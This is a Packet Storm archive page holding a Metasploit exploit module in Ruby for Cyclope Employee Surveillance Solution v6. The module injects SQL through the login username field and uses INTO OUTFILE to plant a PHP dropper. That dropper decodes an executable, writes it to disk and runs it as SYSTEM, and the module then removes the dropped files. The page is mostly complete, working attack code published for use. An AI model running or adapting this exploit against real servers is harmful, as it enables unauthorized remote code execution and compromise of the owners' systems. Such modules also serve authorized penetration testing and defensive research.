Twenty Year Anniversary

Cyclope Employee Surveillance Solution 6 SQL Injection

Cyclope Employee Surveillance Solution 6 SQL Injection
Posted Aug 14, 2012
Authored by loneferret, sinn3r | Site metasploit.com

This Metasploit module exploits a SQL injection found in Cyclope Employee Surveillance Solution. Because the login script does not properly handle the user-supplied username parameter, a malicious user can manipulate the SQL query, and allows arbitrary code execution under the context of 'SYSTEM'.

tags | exploit, arbitrary, code execution, sql injection
advisories | OSVDB-84517
MD5 | 837146f8a3b99b3c8dfc3c6b60f22822

Cyclope Employee Surveillance Solution 6 SQL Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "Cyclope Employee Surveillance Solution v6 SQL Injection",
'Description' => %q{
This module exploits a SQL injection found in Cyclope Employee Surveillance
Solution. Because the login script does not properly handle the user-supplied
username parameter, a malicious user can manipulate the SQL query, and allows
arbitrary code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'loneferret', #Original discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '84517'],
['EDB', '20393']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
['Cyclope Employee Surveillance Solution v6.2 or older', {}]
],
'Privileged' => false,
'DisclosureDate' => "Aug 8 2012",
'DefaultTarget' => 0))

register_options(
[
OptPort.new('RPORT', [true, "The web application's port", 7879]),
OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
], self.class)
end

def check
peer = "#{rhost}:#{rport}"
path = File.dirname("#{target_uri.path}/.")
b64_version = get_version(path)
if b64_version.empty?
print_error("#{peer} - Unable to determine the version number")
else
b64_version = Rex::Text.decode_base64(b64_version)
if b64_version =~ /^[0-6]\.1/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

return Exploit::CheckCode::Unknown
end


def get_version(path)
res = send_request_raw({'uri'=> "#{path}index.php"})
return '' if not res

v = res.body.scan(/\<link rel\=\"stylesheet\" type\=\"text\/css\" href\=\"([\w\=]+)\/css\/.+\" \/\>/).flatten[0]
return '' if not v

return v
end


def on_new_session(cli)
if cli.type != 'meterpreter'
print_error("Please remember to manually remove #{@exe_fname} and #{@php_fname}")
return
end

cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

begin
print_status("Deleting #{@php_fname}")
cli.fs.file.rm(@php_fname)
rescue ::Exception => e
print_error("Please note: #{@php_fname} is stil on disk.")
end

begin
print_status("Deleting #{@exe_fname}")
cli.fs.file.rm(@exe_fname)
rescue ::Exception => e
print_error("Please note: #{@exe_fname} is still on disk.")
end
end


def get_php_payload(fname)
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q|
<?php
$f = fopen("#{fname}", "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
exec("#{fname}");
?>
|
php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
return php
end


def exploit
peer = "#{rhost}:#{rport}"
path = File.dirname("#{target_uri.path}/.")

#
# Need to fingerprint the version number in Base64 for the payload path
#
b64_version = get_version(path)
if b64_version.empty?
print_error("#{peer} - Unable to determine the version number")
return
end

print_status("#{peer} - Obtained version: #{Rex::Text.decode_base64(b64_version)}")

#
# Prepare our payload (naughty exe embedded in php)
#
@exe_fname = Rex::Text.rand_text_alpha(6) + '.exe'
@php_fname = Rex::Text.rand_text_alpha(6) + '.php'
php = get_php_payload(@exe_fname).unpack("H*")[0]
sqli = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/#{b64_version}/#{@php_fname}' LINES TERMINATED BY 0x#{php}) and '1'='1"

#
# Inject payload
#
print_status("#{peer} - Injecting PHP payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => path,
'vars_post' => {
'act' => 'auth-login',
'pag' => 'login',
'username' => sqli,
'password' => Rex::Text.rand_text_alpha(5)
}
})

#
# Load our payload
#
print_status("#{peer} - Loading payload: #{path}#{b64_version}/#{@php_fname}")
send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"})
if res and res.code == 404
print_error("#{peer} - Server returned 404, the upload attempt probably failed.")
return
end

handler
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    7 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    40 Files
  • 23
    May 23rd
    64 Files
  • 24
    May 24th
    55 Files
  • 25
    May 25th
    16 Files
  • 26
    May 26th
    17 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close